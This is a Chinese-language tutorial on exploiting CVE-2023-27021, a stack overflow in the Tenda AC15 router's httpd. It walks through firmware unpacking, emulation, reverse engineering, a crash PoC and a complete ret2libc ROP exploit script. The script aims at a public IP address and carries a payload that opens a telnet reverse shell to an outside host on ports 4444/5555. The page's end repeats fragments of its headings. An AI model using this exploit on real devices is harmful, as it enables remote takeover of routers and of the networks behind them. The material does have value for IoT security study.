路由器通用0day漏洞挖掘及RCE思路教学文档<\/h1>

一、概述<\/h2>
本教学文档以Tenda AC15 V15.03.05.19路由器为例，详细讲解如何挖掘栈溢出漏洞并实现远程代码执行(RCE)。通过分析CVE-2023-27021漏洞，为IoT安全初学者提供完整的漏洞挖掘和利用思路。<\/p>

二、环境搭建<\/h2>

1. 获取固件<\/h3>

从厂商官网下载目标固件：https:\/\/www.tenda.com.cn\/download\/detail-2680.html<\/li>

建议选择更新间隔较长的旧版本固件，漏洞概率更高<\/li> <\/ul>

2. 解包固件<\/h3>

使用binwalk解包固件文件（建议完整安装binwalk）：<\/p>

binwalk -Me US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin --run-as=<\/span>root
<\/span><\/span><\/code><\/pre>解包后得到squashfs-root<\/code>文件夹，包含路由器的文件系统。<\/p>
3. 关键文件定位<\/h3>

Web服务程序通常位于bin\/httpd<\/code><\/li>
使用file<\/code>命令确认文件架构：ARM 32位小端程序<\/li>
<\/ul>
4. 模拟运行环境<\/h3>
安装QEMU进行模拟：<\/p>
apt install qemu qemu-user-static qemu-system
<\/span><\/span><\/code><\/pre>配置网络桥接：<\/p>
apt install uml-utilities bridge-utils
<\/span><\/span>brctl addbr br0
<\/span><\/span>brctl addif br0 ens32
<\/span><\/span>ifconfig br0 up
<\/span><\/span>dhclient br0
<\/span><\/span><\/code><\/pre>启动HTTP服务：<\/p>
cp $(<\/span>which qemu-arm-static)<\/span> .
<\/span><\/span>sudo chroot .\/ .\/qemu-arm-static .\/bin\/httpd
<\/span><\/span><\/code><\/pre>若返回404，需复制webroot内容：<\/p>
mkdir webroot
<\/span><\/span>cp -rf .\/webroot_ro\/* .\/webroot\/
<\/span><\/span><\/code><\/pre>三、漏洞挖掘<\/h2>
1. 漏洞定位策略<\/h3>

重点关注危险函数：

格式化字符串函数：scanf<\/li>
字符串操作函数：strcpy、strcat、sprintf<\/li>
<\/ul>
<\/li>
历史漏洞分析：Tenda路由器常见strcpy相关漏洞<\/li>
<\/ul>
2. 逆向分析<\/h3>
使用IDA分析httpd<\/code>文件：<\/p>

搜索strcpy<\/code>函数交叉引用（约160个）<\/li>
逐个分析函数调用上下文<\/li>
<\/ol>
3. 漏洞确认<\/h3>
发现formSetFirewallCfg<\/code>函数存在漏洞：<\/p>
char<\/span> s[40<\/span>]; \/\/ [sp+4Ch] [bp-34h] BYREF
<\/span><\/span><\/span><\/span>websGetVar(request, "firewallEn"<\/span>, s, 0x100<\/span>);
<\/span><\/span>strcpy(v3, s); \/\/ 无长度检查，直接拷贝
<\/span><\/span><\/span><\/code><\/pre>4. 漏洞验证<\/h3>
构造PoC验证漏洞：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/47.98.137.248\/goform\/SetFirewallCfg"<\/span>
<\/span><\/span>header =<\/span> {
<\/span><\/span>    "Content-Type"<\/span>: "application\/x-www-form-urlencoded; charset=UTF-8"<\/span>,
<\/span><\/span>    "Cookie"<\/span>: "password=rtp5gk"<\/span>
<\/span><\/span>}
<\/span><\/span>payload =<\/span> "A"<\/span> *<\/span> 500<\/span>
<\/span><\/span>data =<\/span> {"firewallEn"<\/span>: payload}
<\/span><\/span>response =<\/span> requests.<\/span>post(url, headers=<\/span>header, data=<\/span>data, timeout=<\/span>5<\/span>)
<\/span><\/span>print(response.<\/span>text)
<\/span><\/span><\/code><\/pre>成功触发拒绝服务，确认漏洞存在。<\/p>
四、漏洞利用<\/h2>
1. 保护机制检查<\/h3>
使用checksec<\/code>检查二进制保护：<\/p>

仅NX enabled（不可执行栈）<\/li>
利用思路：ROP链构造参数执行system命令<\/li>
<\/ul>
2. 调试环境配置<\/h3>
安装gdb-multiarch及pwndbg插件：<\/p>
apt install gdb-multiarch
<\/span><\/span>git clone https:\/\/github.com\/pwndbg\/pwndbg
<\/span><\/span>cd pwndbg &&<\/span> .\/setup.sh
<\/span><\/span><\/code><\/pre>启动调试：<\/p>
chroot .\/ .\/qemu-arm-static -g 9999<\/span> .\/bin\/httpd
<\/span><\/span><\/code><\/pre>另开终端连接调试：<\/p>
gdb-multiarch .\/bin\/httpd
<\/span><\/span>set architecture arm
<\/span><\/span>target remote :9999
<\/span><\/span>c
<\/span><\/span><\/code><\/pre>3. 利用思路（ret2libc）<\/h3>

获取libc基地址<\/li>
计算system函数地址<\/li>
控制r0寄存器传入参数<\/li>
执行system函数<\/li>
<\/ol>
4. 关键步骤实现<\/h3>
(1) 计算偏移量<\/h4>
使用cyclic确定溢出偏移：<\/p>
payload =<\/span> cyclic(500<\/span>)  # 替换原PoC<\/span>
<\/span><\/span><\/code><\/pre>调试后使用cyclic -l <PC值><\/code>计算得偏移量为52。<\/p>
(2) 获取libc基地址<\/h4>
调试时使用vmmap<\/code>查看内存布局，确定libc基地址为0xff58c000<\/code>。<\/p>
(3) 计算system地址<\/h4>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>libc =<\/span> ELF(".\/lib\/libc.so.0"<\/span>)
<\/span><\/span>system_offset =<\/span> libc.<\/span>symbols["system"<\/span>]
<\/span><\/span>system_addr =<\/span> libc_base_addr +<\/span> system_offset
<\/span><\/span><\/code><\/pre>(4) 寻找ROP gadget<\/h4>
查找控制r0的gadget：<\/p>
ROPgadget --binary .\/lib\/libc.so.0 | grep "mov r0, sp"<\/span>
<\/span><\/span><\/code><\/pre>选择0x00040cb8<\/code>：<\/p>
move_r0 =<\/span> libc_base_addr +<\/span> 0x00040cb8<\/span>
<\/span><\/span><\/code><\/pre>查找pop r3的gadget：<\/p>
ROPgadget --binary .\/lib\/libc.so.0 --only "pop"<\/span>|grep r3
<\/span><\/span><\/code><\/pre>选择0x00018298<\/code>：<\/p>
r3_pop =<\/span> libc_base_addr +<\/span> 0x00018298<\/span>
<\/span><\/span><\/code><\/pre>5. 完整利用脚本<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/47.98.137.248"<\/span>
<\/span><\/span>header =<\/span> {
<\/span><\/span>    "Content-Type"<\/span>: "application\/x-www-form-urlencoded; charset=UTF-8"<\/span>,
<\/span><\/span>    "Cookie"<\/span>: "password=bcf33de30ebf57e4d3785c08adec4b85cvztgb"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span># 命令执行：通过telnet反弹shell<\/span>
<\/span><\/span>cmd =<\/span> b<\/span>"echo test;telnet 101.43.8.96 4444 | \/bin\/sh | telnet 101.43.8.96 5555"<\/span>
<\/span><\/span>
<\/span><\/span>libc_base_addr =<\/span> 0xff58c000<\/span>
<\/span><\/span>libc =<\/span> ELF(".\/lib\/libc.so.0"<\/span>)
<\/span><\/span>system_offset =<\/span> libc.<\/span>symbols["system"<\/span>]
<\/span><\/span>system_addr =<\/span> libc_base_addr +<\/span> system_offset
<\/span><\/span>r3_pop =<\/span> libc_base_addr +<\/span> 0x00018298<\/span>
<\/span><\/span>move_r0 =<\/span> libc_base_addr +<\/span> 0x00040cb8<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> cyclic(52<\/span>) +<\/span> p32(r3_pop) +<\/span> p32(system_addr) +<\/span> p32(move_r0) +<\/span> cmd
<\/span><\/span>data =<\/span> {"firewallEn"<\/span>: payload}
<\/span><\/span>response =<\/span> requests.<\/span>post(url +<\/span> "\/goform\/SetFirewallCfg"<\/span>, headers=<\/span>header, data=<\/span>data)
<\/span><\/span>print(response.<\/span>text)
<\/span><\/span><\/code><\/pre>6. 获取shell<\/h3>
在攻击机监听端口：<\/p>
nc -lvp 4444<\/span>
<\/span><\/span>nc -lvp 5555<\/span>  # 接收回显<\/span>
<\/span><\/span><\/code><\/pre>成功建立连接后即可执行命令。<\/p>
五、总结<\/h2>

固件分析：通过binwalk解包获取文件系统<\/li>
漏洞挖掘：从危险函数入手，分析调用上下文<\/li>
漏洞验证：构造PoC触发漏洞<\/li>
利用开发：基于ret2libc构造ROP链<\/li>
实战技巧：使用telnet反弹shell（路由器通常不支持\/bin\/bash）<\/li>
<\/ol>
关键点：<\/p>

准确计算偏移量<\/li>
正确获取libc基地址<\/li>
精心选择ROP gadget<\/li>
考虑目标环境限制（如不支持\/bin\/bash）<\/li>
<\/ul>

路由器通用0day漏洞挖掘及RCE思路教学文档<\/h1>

一、概述<\/h2> 本教学文档以Tenda AC15 V15.03.05.19路由器为例，详细讲解如何挖掘栈溢出漏洞并实现远程代码执行(RCE)。通过分析CVE-2023-27021漏洞，为IoT安全初学者提供完整的漏洞挖掘和利用思路。<\/p>

二、环境搭建<\/h2>

三、漏洞挖掘<\/h2>

四、漏洞利用<\/h2>

4. 关键步骤实现<\/h3>

一、概述<\/h2>
本教学文档以Tenda AC15 V15.03.05.19路由器为例，详细讲解如何挖掘栈溢出漏洞并实现远程代码执行(RCE)。通过分析CVE-2023-27021漏洞，为IoT安全初学者提供完整的漏洞挖掘和利用思路。<\/p>